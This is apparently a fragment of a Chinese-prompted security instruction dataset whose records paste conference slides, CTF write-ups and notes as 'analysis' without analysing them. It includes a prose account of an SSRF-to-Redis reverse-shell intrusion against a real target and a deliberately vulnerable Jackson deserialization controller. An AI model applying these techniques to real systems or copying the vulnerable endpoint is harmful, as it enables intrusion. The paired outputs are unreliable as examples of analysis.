that could happen?  https://www.youtube.com/watch?v=wfzgIxMEo8g  Mechanical failures can be influenced by targeting insecure control networks!  But most importantly 4 To Prevent Attackers from Turning these Peaceful Systems 5 Into Targets of Ransomware or 6 Give me $$$$$ Into Massive Burning Wastelands 7 What is a Wind Farm?  Power plant that converts wind into electricity  Wind turbines  Variable power source that generates energy from wind  Substations  Collects the energy produced by wind turbines and feeds it into the power grid  IEC-61400-* specifications  Defines design, operations and communications requirements 8 Red Teaming a Wind Farm Red Teaming at Over 300 Feet Wind Turbine Anatomy 11 Nacelle Turbine Communications Infrastructure 12 Wind Farm Operations Control Network 13 IEC-61400-25  Defines uniform communications requirements for wind power plants  Support for a handful of protocols  SOAP-based web services  OPC XML-DA  DNP3  IEC 60870-5-10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Call the plumber  You have a leak in your (named) pipe 2  Presenter introduction  Key terms  Connecting to named pipes  Pipe ACLs And Connection Limitation  Named pipes in the wild Agenda  Enumerating And Scanning For Named Pipes  Sniffing Named Pipes Content  Fuzzing Named Pipes  Exploitation And Impact  Case studies & Live demo!  Mitigation And Defense 3 Gil Cohen CTO, Comsec Global  IDF Programming course graduate (Mamram) and former waterfall developers  Cyber Security professional with more than 12 years of experience  Vast comprehensive knowledge in penetration tests, secured design, programmers training and information security in general 30 years Established in 1987, Comsec has nearly three- decades of experience in all aspects of information security. 150 consultants Allows us to deliver a broad spectrum of services and to provide a uniquely flexible service level. 600 clients From blue chip companies to start-ups, Comsec has a deep sector expertise in most verticals and un- paralleled understanding of our clients business environment. 22 countries With offices in London, Rotterdam and excellence center in Tel Aviv, Comsec is able to deliver global impact through local presence spanning over 22 countries and five continents. Your host 4 core Services Innovation, Knowledge & Experience to Keep You Ahead of the Curve. Technical Security Services SDLC Strategy & Developer Training Architecture Design & Review Security Code Review Infrastructur e & Application Testing Mobile & IoT Security Testing Penetration Testing Offensive Security Services DDoS Readiness & Simulation Online Discovery & Security Intelligence Incident Response & Crisis Mngmt Red Team Exercises Executive Cyber Drill Employee Awareness Training & Social Engineering Exercises Governance Risk & Compliance Risk Management PCI DSS PA DSS P2PE Certification CISO as a Service ISO 27001 ISO 27032 GDPR HIPAA Cloud Readiness Cyber Readiness & Strategy 5 Key Terms 6 Introduction To Key Terms IPC or In", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1589-001-收集目标组织身份信息-凭证 ## 来自ATT&CK的描述 在入侵受害者之前攻击者可能会收集凭证信息这些信息可以在目标定位期间使用攻击者收集的帐户凭据可以是与目标受害者组织直接相关的凭据也可以尝试利用用户倾向于在个人帐户和企业帐户中使用相同密码的趋势 攻击者可以通过各种方式收集此信息例如通过[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)攻击者还可能入侵站点然后植入旨在收集访问者网站认证cookie的恶意内容引自ATT ScanBox凭证信息也可能通过在线或其他可访问的数据集例如[搜索引擎](https://contribute.knowledge.qihoo.net/detail/technique/T1593/002)泄露凭据转储代码仓库等暴露给攻击者引自Register Deloitte引自Register Uber引自Detectify Slack Tokens引自Forbes GitHub Creds引自GitHub truffleHog引自GitHub Gitrob引自CNET Leaks攻击者还可以从暗网或其他黑市购买凭证收集这些信息可能为其他形式的侦察提供可能性例如[搜索开放网站/域](https://contribute.knowledge.qihoo.net/detail/technique/T1593)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)建立运营资源例如[入侵账号](https://contribute.knowledge.qihoo.net/detail/technique/T1586)或实现初始访问例如[外部远程服务](https://contribute.knowledge.qihoo.net/detail/technique/T1133)或[有效账号](https://contribute.knowledge.qihoo.net/detail/technique/T1078) ## 测试案例 1在tg-sgk机器人处直接输入受害者的邮箱微博地址手机号码QQ等进行查寻受害者的密码信息 2google hacking常见搜索引擎shodan/FOFA/Zoomeye等 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类攻击活动的发生率很高并且相关的误报率也很高并且有可能发生在目标组织的视野之外从而使防御者难以发现 检测工作可能会集中在攻击者生命周期的相关阶段例如在\"初始访问\"阶段 ## 关联TIP [[T1589-002-收集目标组织身份信息-邮箱地址]] [[T1589-003-收集目标组织身份信息-员工姓名]] ## 参考推荐 MITRE-ATT&CK-T1589-001 <https://attack.mitre.org/techniques/T1589/001/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWHY CORRUPTED (?) SAMPLES IN RECENT APT? CASE OF JAPAN AND TAIWAN By Suguru Ishimaru Dec 2016 Introduction 3 | Introduction $ whoami Suguru_ISHIMARU $ whois suguru_ishimaru Job_title: Researcher Department: Global Research Analysis Team Organization: Kaspersky Labs E-mail: suguru.ishimaru[at]kaspersky.com https://securelist.com/blog/events/75730/conference-report-hitcon-2016-in-taipei/ My last blogpost was Conference Report: HITCON 2016 in Taipei Contents 5 | Contents $ history | tail -n5 139 problem 140 motivation 141 emdivi 143 elirks 144 conclusion Problem 7 | Problem: A lot of targeted attacks More than 40 APT 8 | Problem: The biggest issue is... Question: What is the biggest problem in APT seen from antivirus side? Hard work No detect No sample We collect mass spread samples. However, we could not get APT samples easily. Especially, second stage sample is extremely rare. 9 | Problem: Corrupted samples We found samples, sometimes they were corrupted. That means they are executable but crashing: 1. Memory dump 2. Unknown binary data 3. Broken data 4. Cured by Anti Virus 5. Quarantined file 6. Password encrypted archive without password 10 | Problem: Why corrupted samples? Question: Why corrupted samples in recent APT? I will tell you my answer in conclusion Motivation 12 | Motivation: What should we do? Question: What should we do when we got corrupted malware in APT? Just Ignore Deep Analysis Make AV signature 1. Checking really corrupted or not 2. Getting information of related others 13 | Motivation: Two recent APT cases Probably corrupted (?) samples have found in two recent APT. Emdivi Elirks Emdivi 15 | Emdivi: Overview 1. The Blue Termite APT campaign 2. Target region is Japan mainly 3. C2s on compromised legitimate sites 4. spear phishing email 5. drive-by dowonload 6. Watering hole attacks 7. CVE-2014-7247 8. CVE-2015-5119 16 | Japan pension service Emdivi + PlugX MAY 2015 Security report about APT (Emdivi) by Macnica MAY 2016 Target to web site in Taiwa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThree Generations of DoS Attacks (with Audience Participation, as Victims) Defcon, 2011 Bio Summary  The DoS Circus  Layer 4 DDoS: Thousands of attackers bring down one site  Layer 7 DoS: One attacker brings down one site  Link-Local DoS: IPv6 RA Attack: One attacker brings down a whole network The DoS Circus Characters Wikileaks  Published <1000 US Gov't diplomatic cables from a leak of 250,000  Distributed an encrypted \"Insurance\" file by BitTorrent  Widely assumed to contain the complete, uncensored leaked data  Encrypted with AES-256--no one is ever getting in there without the key  Key to be released if Assange is jailed or killed, but he is in UK now resisting extradition to Sweden and the key has not been released Anonymous Operation Payback  4chan's Anonymous group  Attacked Scientology websites in 2008  Attacked the RIAA and other copyright defenders  Using the Low Orbit Ion Cannon with HiveMind (DDoS)  \"Opt-in Botnet\" HB Gary Federal  Aaron Barr  Developed a questionable way to track people down online  By correlating Twitter, Facebook, and other postings  Announced in Financial Times that he had located the leaders of Anonymous and would reveal them in a few days Social Engineering & SQLi  http://tinyurl.com/4gesrcj Leaked HB Gary Emails  For Bank of America  Discredit Wikileaks  Intimidate Journalist Glenn Greenwald  For the Chamber of Commerce  Discredit the watchdog group US Chamber Watch  Using fake social media accounts  For the US Air Force  Spread propaganda with fake accounts  http://tinyurl.com/4anofw8 Drupal Exploit Th3j35t3r  \"Hacktivist for Good\"  Claims to be ex-military  Originally performed DoS attacks on Jihadist sites  Bringing them down for brief periods, such as 30 minutes  Announces his attacks on Twitter, discusses them on a blog and live on irc.2600.net Jester's Tweets from Dec 2010 Th3j35t3r v. Wikileaks  He brought down Wikileaks single-handed for more than a day  I was chatting with him in IRC while he did it, and he proved it was", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity Art | August 2011 www.security-art.com Itzik Kotler, Chief Technology Officer Iftach Ian Amit, VP Consulting Sounds Like Botnet Intro to VoIP  Its everywhere  Home (Vonage, Skype, TeamSpeak, Comcast, etc)  Office (Cisco, Avaya, Lucent, Asterisk, etc)  Easy to deploy  Most are plug and talk with fancy web interfaces to configure features such as voicemail, forwarding, conference calls, etc Overview of SIP  Request/Response model  Responsible for setup/teardown of voice/video calls  Designed to allow piercing of firewalls, NAT, etc  Security? meh (basic identification, usually not required in most PBXs, easily sniffed) VoIP as a Getaway Car  So VoIP can traverse firewalls easily  And can go outside the corporate network over PSTN lines (no internetz needed)  And is rarely monitored (can you hear me now aint gonna pass through the DLP)  EXFILTRATE! What is a VoIP Botnet  Take your good ole botnet  Disconnect all C&C channels  Replace with VoIP  Profit?  Fully mobilized (NAT piercing)  Looks more legit (try to pick THAT out of the traffic)  Harder to peek into (can you spell whazzzzup? in RTP?) Who Needs a VoIP Botnet  Well, everyone  Botmaster is more mobile (literally)  More anonymous C&C servers (conf call bridge numbers are aplenty)  Can actually transfer fair amounts of data back/forth (remember the modem days?)  Its starting to show up as alternative methods of covert communications  Sorry spooks  VoIP Botnet in Action  Red Team Penetration Testing Engagement  Botnet in No Internet/Closed Networks  Botnet for VoIP Phones VoIP Botnet Architecture  Telephony systems allows both Unicast and Multicast communication  Unicast:  Bot calls Bot Master  Bot Master calls Bot (registered ext. on his PBX)  Multicast:  Bot A calls Conference Call  Bot B calls Conference Call  Bot Master joins Conference Call VoIP Botnet Architecture  Conference Call as IRC Channel Conference Call Bot Bot Bot Bot Master The Call  Calling can be made via TCP/IP or PSTN Bot/Bot Master TCP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow Hackers Won the Zombie Apocalypse Quahogcon - Providence, RI - April 23-25 2010 Dennis Brown QuahogCon July 2010 Introduction  What is Quahogcon  New regional con in Rhode Island  Focusing on Infosec and Maker Culture  Who am I?  Dennis Brown  Quahogcon Organizer  DC401  Rhode Island Defcon Group  Day Job - Security Researcher for Tenable Network Security Quahogcon - Providence, RI - April 23-25 2010 Badge Hardware  Ultimate goal was to have a hackable badge  Functional and usable post-con  Our desired result was to include  Wireless connectivity  A compelling game in the firmware  Open source development environment  Easy to write custom firmware for  We got 3 out of 4! Quahogcon - Providence, RI - April 23-25 2010 The Badge  Based off of RedWire LLC's RedBee Econotag  Freescale MC13224v ARM7 Microcontroller  Zigbee!  36 GPIO Headers  USB connector  easy to flash  Added 2 AAA batteries and 7 LEDs  Low cost (~$30 per badge) Quahogcon - Providence, RI - April 23-25 2010 End Product  Interface Components  2 Buttons + Reset  5 Red LEDs on left  RGY LEDs on right Quahogcon - Providence, RI - April 23-25 2010 Badge Features  Easy to code for  Sorta  Custom firmware  Kismet client  Zigbee sniffer  Killerbee firmware  Zigbee packet injector  Contiki support  Full system environment Quahogcon - Providence, RI - April 23-25 2010 Con Firmware  Wanted an interactive game for attendees  Ways to affect other attendees  Ways to hack other attendees badges  Multiple design ideas  Landed on a Zombies vs. Humans concept  Chosen 3 weeks before the con  Note: More time is a good idea! Quahogcon - Providence, RI - April 23-25 2010 Zombies versus Humans!  Humans kill Zombies!  Multiple attack modes  Zombies kill Humans!  Charge-up attacks  Speakers and Vendors were Clerics!  Healed Humans, reclaimed Zombies  Security Mussel could attack anyone  Not very powerful (so they'd get to work!) Quahogcon - Providence, RI - April 23-25 2010 How It Worked  Live demo!  Attacks did 1-5 damage  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGuests N Goblins: EXPOSING WI-FI EXFILTRATION RISKS AND MITIGATION TECHNIQUES Presenter: Pete Desfigies ! By day : Security Analyst @ TELUS Communications ! By night: break things ! Hobbies: Break more things Presenter: Joshua Brierton ! By Day: SIEM Geek ! By Night: Boat Geek ! Hobbies: Cards against humanity + watching Holy Mountain Presenter: Naveed Islam ! By day: Intelligent Analysis team lead @ TELUS Communications ! By night: Family management, as a father of 2, +1 on the way anytime now ! Hobbies: Learning about religion, science and philosophy etc. Traveling and starting projects that just not complete. Background Anonymity is a big thing Many ways to hide your identity 1. TOR 2. L2P 3. Spotflux 4. Hola Proxyham? Introduction Wifi is everywhere Is Wifi secure enough? It has its own network isolation WPA 2.0 with AES added Sure it is secure, no one can get in from outside And yet, it is open to public for competitive convenience Problem Space Public Wifi = Risks ! Wifi Exfiltration ! Host Implication Security Challenges Insufficient authentication, a catch 22 situation Lack of Egress monitoring Default SSL Spoofed MAC addresses Intro to Our Concept ! A custom mobile App + batch scripts + two servers with dedicated IPs. ! Scans for open Wifi ! Tags the location ! Connects automatically ! Learns about the network ! Collects public fingerprints ! Syncs with a central server Programs + Tools Used ! Python ! Java ! Bash ! SQLITE ! JSON ! Apache ! github ! Crash course mentality ! Android SDK Toolkit Hardware + Tools ! Laptop Kali Linux ! Android Phone ! CentOS Servers Automated Tookit - Wargarble ! Warscanble  Initial Area Scan / Discovery ! Wargarble  Connectvity / Data collection ! Warrepo - Reporting / Results What is WarScanble basically ! Nutshell definition: ! Dead simple WiFi scanner to coordinate the gathering of access points for whatever purpose. How do it do? Step 1 ! Scan for all access points How do it do? Step 2 ! Put all results into a hashable obj", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Tonnerre (Crypto, 200 points, 119 solves) We were pretty sure the service at tonnerre.pwning.xxx:8561 (source) was totally secure. But then we came across this website and now were having second thoughts... We think they store the service users in the same database? ###ENG [PL](#pl-version) This task consisted of two parts: website vulnerable to SQL injection and server authenticating via `zero knowledge proof protocol` specifically `Secure Remote Password protocol`. Using [script](doit.py) we quickly exploited the SQL vulnerability to dump information about the only user stored in database: `username`, `verifier` and `salt` (although we didn't need salt). The next part was forcing [server script](public_server.py) to authenticate us and get the flag. The idea of zero knowledge proof is that the server aka `verifier` knows a `secret` and challenges the user to prove that the user also knows the `secret`. This has to happen without disclosing the `secret` itself so no part of the `secret` should ever be transmitted. The general approach to this problem is that the `verifier` provides a random task that can be solved only by someone with `secret`. In our case the server prompted us for some number (denoted as `pC`) and calculated: ``` c=(pC*v)%N if c not in forbidden set: r=random(2,N-3) pS=(g**r)%N res=(pS+v)%N secret=((pC*b)**r)%N key=f(res, secret) ``` It then sent us `res` and asked for resulting key. We know `N` and `g` from the source code, while `v` is the verifier value we extracted via SQL injection. It is easy to see that if we know `res`, we can calculate `pS`. This is because `pS` has to be less than `N` (it is reminder from division modulo `N`) and we know the value of `v` which is in the same order as `N`. This implies that `pS+v` has to be between `v` and `2N-1` and thus the modular division reminder of `res=(pS+v) mod N` can be: - Bigger than `v` which means that `pS` was small enough that the sum `pS+v` did not exceed `N` and this means the `pS = r", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 前 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 需要代码审计渗透测试红蓝对抗络安全相关业务可以联系我司 2000络安全交流群欢迎佬们来交流 群号820783253 最近BugBounty挖了不少但多数都是有就的漏洞需要动脑的实属罕 今天就遇到了个常好的案例故作此 0x01 对录批量FUZZ发现处隐蔽接 挖某已经挖了快两个周了期间因为公司业务较繁忙最近直没挖 但是直在ffuf挂着字典对商资产进批量录扫描今天上服务器看了下扫描结果就出货了 接地址为https://xxx.xxxx.com/xxxx/start 我们直接对其进访问 发现该接给我们提供了些可以使的接链接 我们逐个测试拼接接后发现个名为face_xxxx的接有戏 0x02 FUZZ传参格式+参数 访问接提示Method Not Allow405错误那么很显然我们得换POST传参 POST随便传个参过去发现接提示\"Request error, content-type was unsupported\" 很好继续FUZZ content-type header(记得把payload_processing动编码给关掉) FUZZ出来application/json的content-type头可那么很简单了构造JSON数据继续FUZZ JSON数据参数 0x03 SSRF脑到 参数为image_url稍有经验的朋友就可以借此判断出很可能这个参数是加载远程图的 直接进SSRF测试 服务器收到了请求经测试gopherdicthttp等常规协议都可以使~ 之前通过各种域名级录或根录的spring泄露下载heapdumpOQL调试出redis明密码 收集了不少该商内redis的ip和密码也了解到该商的内段 尝试利本处SSRF完全可以批量对内Redis进密码喷洒+反弹shell对边界进突破 0x04 利gopher协议对内脆弱段批量Redis密码喷洒反弹 Shell 普及个知识与未授权直接访问的redis不同加密码认证的redis在命令链接时会多个-a参数指定密码 如图所示如果不传参密码则法执任何redis指令 加密码认证后redis在整个RESQ协议流量中表现如下 认证过程中会多个Auth 写脚本来构造gopher数据注意把这块Auth加上,后续常规操作写计划任务反弹SHELL 利上挖掘到的SSRF点配合之前收集到的内redis密码和脆弱段 直接通过intruder批量跑内的脆弱段redis进密码喷洒喷洒但成功则会写计划任务 最终功夫不负有在个段弹回来了个Shell 商的内Redis主机还能出属实是内安全做的稀烂了 0x04 后 这个洞是在平安夜挖到的~算是圣诞贺礼啦", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# COBOL (RE, 485p, 10 solved) In the task we get an old [IBM SAVF file](EKO.SAVF). Unlike last year, where we could just load it to some online tools, this time the file was corrupted. We quickly had a look around at the file contents, decoded from ebcdic string encoding, but the flag string seemed permutated, so we guessed we actually have to recover the binary and reverse it. This was a huge mistake. We wasted quite some time trying to fix this file, which had some checksum failures. After a while we tried one more time to look at the strings: ```python import codecs import ebcdic def decode(): with codecs.open(\"EKO.SAVF\", 'rb') as input_file: print(input_file.read().decode('cp1148')) ``` We can see there a nice section: ``` YOU ARE RIGHTWE}m_A4rREg0_RrpUN+0NI04NGsa_O+7UT3313F_+rGO3hODt0_In4DE{OASKE NOPE], YOUR SECRET IS WRONG] ``` And from this we guess that the part: ``` }m_A4rREg0_RrpUN+0NI04NGsa_O+7UT3313F_+rGO3hODt0_In4DE{OASKE ``` Is the mangled flag. It's clear it's inverted, so we invert it back: ``` EKSAO{ED4nI_0tDOh3OGr+_F3133TU7+O_asGN40IN0+NUprR_0gERr4A_m} ``` We know that the flag starts with `EKO{` so we need to take 2 characters, remove next 2, and again take 2. We guessed we will check what happens if we proceed like this: ``` EKO{4n0th3r+31TUO_GNINNUR_ERA_EW ``` And inverted: ``` WE_ARE_RUNNING_OUT13+r3ht0n4{OKE ``` So we're on a good track, and we have first half of the flag. Since the second half is also not random, we decided to do our take-2-leave-2, but with offset of 2: ``` SAEDI_DOOG_F337+as400+pr0gr4m} }m4rg0rp+004sa+733F_GOOD_IDEAS ``` This way we get a second half of the flag and rest of the message blended in: ``` EKO{4n0th3r+31337+as400+pr0gr4m} WE_ARE_RUNNING_OUTF_GOOD_IDEAS ``` As can is noticable now, we could have just removed all uppercase and `_` characters from the initial string to get the flag as well.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 私钥 d 相关攻击 ## d 泄露攻击 ### 攻击原理 首先当 $d$ 泄露之后我们自然可以解密所有加密的消息我们甚至还可以对模数 N 进行分解其基本原理如下 我们知道 $ed \\equiv 1 \\bmod \\varphi(n)$那么存在一个 $k$ 使得 $$ ed-1=k\\varphi(n) $$ 又 $\\forall a\\in {Z}_n*$满足$a{ed-1}\\equiv1(\\bmod n)$令 $$ ed-1=2st $$ 其中$t$ 是一个奇数然后可以证明对于至少一半的 $a\\in {Z}_n*$存在一个 $i\\in[1,s]$使得 $$ a{2{i-1}t}\\not\\equiv\\pm1(\\bmod n),a{2{i}t}\\equiv1(\\bmod n) $$ 成立如果 $a,i$ 满足上述条件$gcd(a{2{i-1}t}-1,n)$是 $n$ 的一个非平凡因子所以可以对 $n$ 进行暴力分解 ### 工具 利用以下工具可以直接进行计算 - RsaConverter.exe (https://sourceforge.net/projects/rsaconverter/ , for windows ) - [rsatool.py](https://github.com/ius/rsatool/blob/master/rsatool.py)(分解原理如上) ### 2017 HITB - hack in the card II > The second smart card sent to us has been added some countermeasures by that evil company. They also changed the public key(attachments -> publickey.pem). However it seems that they missed something...... > Can you decrypt the following hex-encoded ciphertext this time? > ``` > 016d1d26a470fad51d52e5f3e90075ab77df69d2fb39905fe634ded81d10a5fd10c35e1277035a9efabb66e4d52fd2d1eaa845a93a4e0f1c4a4b70a0509342053728e89e977cfb9920d5150393fe9dcbf86bc63914166546d5ae04d83631594703db59a628de3b945f566bdc5f0ca7bdfa819a0a3d7248286154a6cc5199b99708423d0749d4e67801dff2378561dd3b0f10c8269dbef2630819236e9b0b3d3d8910f7f7afbbed29788e965a732efc05aef3194cd1f1cff97381107f2950c935980e8954f91ed2a653c91015abea2447ee2a3488a49cc9181a3b1d44f198ff9f0141badcae6a9ae45c6c75816836fb5f331c7f2eb784129a142f88b4dc22a0a977 > ``` 这题是接续 2017 HITB - hack in the card I 的一道题我们直接使用 `openssl` 查看 `publickey.pem` 的公钥发现它的 N 与上一道题的 N 相同并且上题的 Ned 已知由此可直接使用上面的 `rsatool.py` 得到 pq并通过本题的 e 计算出 e 得到明文 ## Wiener's Attack ### 攻击条件 在 d 比较小$d<\\frac{1}{3}N{\\frac{1}{4}}$时攻击者可以使用 **Wiener's Attack** 来获得私钥 ### 攻击原理 - https://en.wikipedia.org/wiki/Wiener%27s_attack - https://sagi.io/2016/04/crypto-classics-wieners-rsa-attack/ ### 工具 - https://github.com/pablocelayes/rsa-wiener-attack - https://github.com/orisano/owiener ## 综合例子 ### 2016 HCTF RSA1 这里我们以 2016 年 HCTF 中 RSA 1 - Crypto So Interesting 为例进行分析[源代码链接](", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHack the legacy! IBM i (aka AS/400) revealed. Bart Kulach System . . . . . : DEFCON23 Subsystem . . . . : QTRACK4 Display . . . . . : QPADEV0001 MA a MV 08/007 Agenda Lets get introduced Why should we care about legacy? Evil Java? Privilege escalation  lets jump! Password security and hash grabbing Summary + Q&A MA a MV 23/001 Lets get introduced Im googleable. https://nl.linkedin.com/in/bartkulach Disclaimer: Any views or opinions presented here are solely those of the author and do not necessarily represent those of his employer(s). MA a MV 23/002 KEEP CALM and PWRDWNSYS *IMMED Why should we care about legacy? MA a MV 23/003 Why should we care about legacy? Its legacy but hard to get rid of. Its processing most interesting data. Its usually less secure than front-ends. Its often more vulnerable than you think. Its still quite accessible to potential intruders. Its existing everywhere - in all economic sectors. Its already been exploited (Hacking iSeries by S.Carmel)! MA a MV 23/004 Evil Java? MA a MV 23/005 Evil Java? IBM Toolbox for Java/JTOpen Allows for remote system API calls and usage of built-in system commands (Limited capability not effective here) Gives the flexibility of coding outside the AS/400 box (no need for extra authorities on the system) Is generally poorly written (decompile and check yourself!) Handling of authorisations by Java VM on server side is inconsistent (object authority vs. data authority), allowing for greater visibility MA a MV 23/006 Demo time: Evil Java  visibility example MA a MV 23/007 Privilege escalation  lets jump! MA a MV 23/008 Privilege escalation  lets jump Part 1  remote profile switching Do you use group profiles? Like one common group profile? Are your admins also members of the group? Are your object and data authorities hardened? Do you monitor profile handle swapping? Lets jump remotely: check the list of profiles you have access to grab a profile handle switch to the profile repeat until youre happy with your acces", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOfir Arkin, 2006 - 2007 Ofir Arkin, kNAC! kNAC! August 2007 Ofir Arkin, CTO 10 (or more) ways to bypass a NAC solution  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! In Memory of Oshri Oz September 13, 1972 - May 27, 2007  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! Agenda What is NAC? NAC Basics 10 (or more) ways to bypass NAC  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! Ofir Arkin CTO & Co-Founder, Insightix http://www.insightix.com Founder, The Sys-Security Group http://www.sys-security.com Computer security researcher  Infrastructure discovery  ICMP Usage in Scanning  Xprobe2  VoIP security  Information warfare  NAC  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! What is NAC?  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! What is NAC? What problem does it aim to solve? What functions does it need to support? What type of a solution is it?  A compliance solution?  A security solution?  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! The Problem  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! The Problem An enterprise network is a complex and dynamic environment which hosts a variety of devices  Workstations, servers, printers, wireless access points, VoIP phones, switches, routers and more The stability, integrity and the regular operation of the enterprise LAN are in jeopardy by rogue, non-compliant and unmanaged elements (viruses, worms, Malware, information theft, etc.)  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! NAC History  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! NAC History  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! What is NAC?  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! What is NAC? Standardization and/or common criteria for NAC does not exist Therefore the definition of what NAC is, what components a NAC solution should (and/or must) have, and what does a NAC solution needs to adhere to varies from one vendor to another  Ofir Arkin, 2006 - 2007 Ofir Arkin, kNAC! What is NAC? The basic task of NAC is to control network access The secondary task of NAC is to ensure compliance As such", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMesaTEE SGX: Redefining AI and Big Data Analysis with Intel SGX Yu Ding Staff Security Scientist, Baidu X-Lab May-29-2019 About me  https://dingelish.com  https://github.com/dingelish  https://github.com/baidu/rust-sgx-sdk  Security Scientist @Baidu X-Lab  Rust Fans  Ph.D on Exploit/Mitigation  Works on Rust-SGX projects MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX Intel SGX for Privacy-Preserving Computation  Background of Intel SGX  Challenges on building a privacy-preserving software stack based on Intel SGX Hybrid Memory Safety  Rule-of-thumb  Practice on Intel SGX Towards a Secure and Trustworthy AI/Big Data Analysis framework  What is trustworthiness?  Achieving trustworthy AI/Big Data Analysis using Intel SGX MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX Intel SGX for Privacy-Preserving Computation  Background of Intel SGX  Challenges on building a privacy-preserving software stack based on Intel SGX Hybrid Memory Safety  Rule-of-thumb  Practice on Intel SGX Towards a Secure and Trustworthy AI/Big Data Analysis framework  What is trustworthiness?  Achieving trustworthy AI/Big Data Analysis using Intel SGX MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX  Cloud Provider  Data Owner  Algorithm Provider (can be data owner)  Dont trust each other  Data leaves its owner but still guaranteed to be under control MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX  Solution Overview  Use Intel SGX to establish trust and TEE  Secure and Trusted Authentication/Authorization  Secure and Trusted Channel  Secure and Trusted Execution Environment  Build system with hybrid memory safety  Trustworthy AI/Big Data Analysis MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX MesaTEE SGX Redefining AI and Big Data Analysis with Intel SGX Intel SGX for Privacy-Preserving Computation  Ba", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDemorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network Svetlana Gaivoronski, PhD Student, Moscow State University Dennis Gamayunov, Senior Researcher, Moscow State University Memory corruption, 0-days, shellcodes Why should anyone care about shellcodes in 2012? CONS:  Old exploitation technique, too old for Web-2.0-and-Clouds- Everywhere-World (some would say)  According to Microsofts 2011 stats*, user unawareness is #1 reason for malware propagaion, and 0-days are less than 1%  Endpoint security products deal with known malware quite well, why should we care about unkown?.. PROS:  Memory corruption is still there ;-)  Hey, Microsoft, were all excited with MS12-020  Tools like Metasploit are widely used by pentesters and blackhat community  Targeted attacks of critical infrastructure - what about early detection?  Endpoint security is mostly signature-based, and does not help with 0-days  Its fun! ;) * http://download.microsoft.com/download/0/3/3/0331766E-3FC4-44E5-B1CA- 2BDEB58211B8/Microsoft_Security_Intelligence_Report_volume_11_Zeroing_in_on_Malware_ Propagation_Methods_English.pdf1 CTF Madness  Teams write 0-days from scratch  Game traffic is full of exploits all the time  Detection of shellcode allows to get hints about your vulns and ways of exploitation Team 1 Team 2 Team 3 Team 4 Team 5 Another POV: Privacy and Trust in Digital Era We share almost all aspects of our lives with digital devices (laptops, cellphones and so on) and Internet:  Bank accounts  Health records  Personal information Recent privacy issues with social networks and cloud providers:  LinkedIn passwords hashes leak  Foursquare vulns  Whats next?.. Maybe the risk of 0-days will fade away?  Modern software market for mobile and social applications is too competitive for developers to invest in security  Programmers work under pressure of time limitation; managers who prefer quantity and no quality, etc. Despite the fact of significant efforts to improve code quality, the number o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.b1ngz.sec.controller; import com.b1ngz.sec.model.Target; import com.b1ngz.sec.util.ResourceUtils; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RestController; /** * Created by b1ngz on 2018/9/8. */ @RestController public class JacksonController { @PostMapping(value = \"exploit\", consumes = \"application/json\") public String test(@RequestBody Target target) throws Exception { return target.toString(); } @GetMapping(value = \"spel.xml\") public String getSpelXml() throws Exception { return ResourceUtils.readResourceFileAsStr(\"/spel.xml\"); } }", "category": "text_analysis", "source": "security_papers"}
